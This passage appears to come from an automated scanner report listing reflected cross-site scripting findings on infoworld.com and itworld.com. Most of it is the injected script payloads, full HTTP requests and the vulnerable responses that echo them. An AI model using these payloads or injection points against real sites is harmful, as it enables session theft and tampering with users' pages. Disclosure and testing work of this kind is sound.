Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:31:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:31:03 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460663-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51162

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=sitesb3b7c"><script>alert(1)</script>9093b01b81e/all/themes/ifw/scripts/leadgen_tracking.js&6">
...[SNIP]...

1.82. http://www.infoworld.com/sites/all/themes/ifw/scripts/leadgen_tracking.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /sites/all/themes/ifw/scripts/leadgen_tracking.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 378a5"><script>alert(1)</script>bf3646dc20c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all378a5"><script>alert(1)</script>bf3646dc20c/themes/ifw/scripts/leadgen_tracking.js?6 HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:31:06 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:31:06 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460666-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51162

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=sites/all378a5"><script>alert(1)</script>bf3646dc20c/themes/ifw/scripts/leadgen_tracking.js&6">
...[SNIP]...

1.83. http://www.infoworld.com/sites/all/themes/ifw/scripts/leadgen_tracking.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /sites/all/themes/ifw/scripts/leadgen_tracking.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea9f4"><script>alert(1)</script>51020903fbb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/themesea9f4"><script>alert(1)</script>51020903fbb/ifw/scripts/leadgen_tracking.js?6 HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:31:08 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:31:08 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460668-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51162

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=sites/all/themesea9f4"><script>alert(1)</script>51020903fbb/ifw/scripts/leadgen_tracking.js&6">
...[SNIP]...

1.84. http://www.infoworld.com/sites/all/themes/ifw/scripts/leadgen_tracking.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /sites/all/themes/ifw/scripts/leadgen_tracking.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d58bf"><script>alert(1)</script>d8f6718d75 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/themes/ifwd58bf"><script>alert(1)</script>d8f6718d75/scripts/leadgen_tracking.js?6 HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:31:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:31:10 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460670-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=sites/all/themes/ifwd58bf"><script>alert(1)</script>d8f6718d75/scripts/leadgen_tracking.js&6">
...[SNIP]...

1.85. http://www.infoworld.com/sites/all/themes/ifw/scripts/leadgen_tracking.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /sites/all/themes/ifw/scripts/leadgen_tracking.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe989"><script>alert(1)</script>30d8dbc1884 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/themes/ifw/scriptsfe989"><script>alert(1)</script>30d8dbc1884/leadgen_tracking.js?6 HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:31:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:31:12 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460672-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51162

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=sites/all/themes/ifw/scriptsfe989"><script>alert(1)</script>30d8dbc1884/leadgen_tracking.js&6">
...[SNIP]...

1.86. http://www.infoworld.com/sites/all/themes/ifw/scripts/leadgen_tracking.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /sites/all/themes/ifw/scripts/leadgen_tracking.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afa98"><script>alert(1)</script>dee386dd2b5 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/themes/ifw/scripts/leadgen_tracking.jsafa98"><script>alert(1)</script>dee386dd2b5?6 HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.infoworld.com/

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:31:14 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:31:14 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460674-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51162

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=sites/all/themes/ifw/scripts/leadgen_tracking.jsafa98"><script>alert(1)</script>dee386dd2b5&6">
...[SNIP]...

1.87. http://www.infoworld.com/sites/default/files/ifw_favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /sites/default/files/ifw_favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6aa62"><script>alert(1)</script>9afe6333721 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites6aa62"><script>alert(1)</script>9afe6333721/default/files/ifw_favicon.ico HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:31:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:31:19 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460679-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=sites6aa62"><script>alert(1)</script>9afe6333721/default/files/ifw_favicon.ico">
...[SNIP]...

1.88. http://www.infoworld.com/sites/default/files/ifw_favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /sites/default/files/ifw_favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa000"><script>alert(1)</script>4f5035b6721 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/defaultaa000"><script>alert(1)</script>4f5035b6721/files/ifw_favicon.ico HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:31:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:31:21 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460681-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=sites/defaultaa000"><script>alert(1)</script>4f5035b6721/files/ifw_favicon.ico">
...[SNIP]...

1.89. http://www.infoworld.com/sites/default/files/ifw_favicon.ico [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /sites/default/files/ifw_favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2526"><script>alert(1)</script>f7e954db30b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/default/filese2526"><script>alert(1)</script>f7e954db30b/ifw_favicon.ico HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:31:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:31:24 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460684-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=sites/default/filese2526"><script>alert(1)</script>f7e954db30b/ifw_favicon.ico">
...[SNIP]...

1.90. http://www.infoworld.com/sites/default/files/ifw_favicon.ico [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /sites/default/files/ifw_favicon.ico

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4dbc5"><script>alert(1)</script>44fb7454e2a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/default/files/ifw_favicon.ico4dbc5"><script>alert(1)</script>44fb7454e2a HTTP/1.1
Host: www.infoworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:31:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 19 Sep 2011 19:31:27 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1316460687-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 51147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<a href="/user?destination=sites/default/files/ifw_favicon.ico4dbc5"><script>alert(1)</script>44fb7454e2a">
...[SNIP]...

1.91. http://www.itworld.com/elqNow/elqBlank.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /elqNow/elqBlank.htm

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80584"-alert(1)-"7ee5b9894fe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /elqNow80584"-alert(1)-"7ee5b9894fe/elqBlank.htm HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-1; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; s_pers=%20s_pv%3Dhomepage%7C1316479684409%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:26:09 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460369"
Content-Type: text/html; charset=utf-8
Content-Length: 57127
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:26:10 GMT
X-Varnish: 1038161729
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
.prop13="CMS";
s.prop14="kgerich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/elqNow80584"-alert(1)-"7ee5b9894fe/elqBlank.htm";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find the page you requested.";
s.e
...[SNIP]...

1.92. http://www.itworld.com/elqNow/elqBlank.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /elqNow/elqBlank.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0d84"><script>alert(1)</script>b5fd747c31e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elqNowa0d84"><script>alert(1)</script>b5fd747c31e/elqBlank.htm HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-1; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; s_pers=%20s_pv%3Dhomepage%7C1316479684409%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:25:55 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460355"
Content-Type: text/html; charset=utf-8
Content-Length: 57347
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:25:58 GMT
X-Varnish: 1038161353
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/elqNowa0d84"><script>alert(1)</script>b5fd747c31e/elqBlank.htm"/>
...[SNIP]...

1.93. http://www.itworld.com/elqNow/elqBlank.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /elqNow/elqBlank.htm

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd1c5"-alert(1)-"d23f8151abb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /elqNow/elqBlank.htmcd1c5"-alert(1)-"d23f8151abb HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-1; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; s_pers=%20s_pv%3Dhomepage%7C1316479684409%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:26:35 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460395"
Content-Type: text/html; charset=utf-8
Content-Length: 57126
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:26:37 GMT
X-Varnish: 1038162410
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
;
s.prop14="kgerich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/elqNow/elqBlank.htmcd1c5"-alert(1)-"d23f8151abb";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find the page you requested.";
s.eVar13="CMS";

...[SNIP]...

1.94. http://www.itworld.com/elqNow/elqBlank.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /elqNow/elqBlank.htm

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20d41"><script>alert(1)</script>f154269347f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elqNow/elqBlank.htm20d41"><script>alert(1)</script>f154269347f HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-1; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; s_pers=%20s_pv%3Dhomepage%7C1316479684409%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:26:29 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460389"
Content-Type: text/html; charset=utf-8
Content-Length: 57347
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:26:31 GMT
X-Varnish: 1038162280
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/elqNow/elqBlank.htm20d41"><script>alert(1)</script>f154269347f"/>
...[SNIP]...

1.95. http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
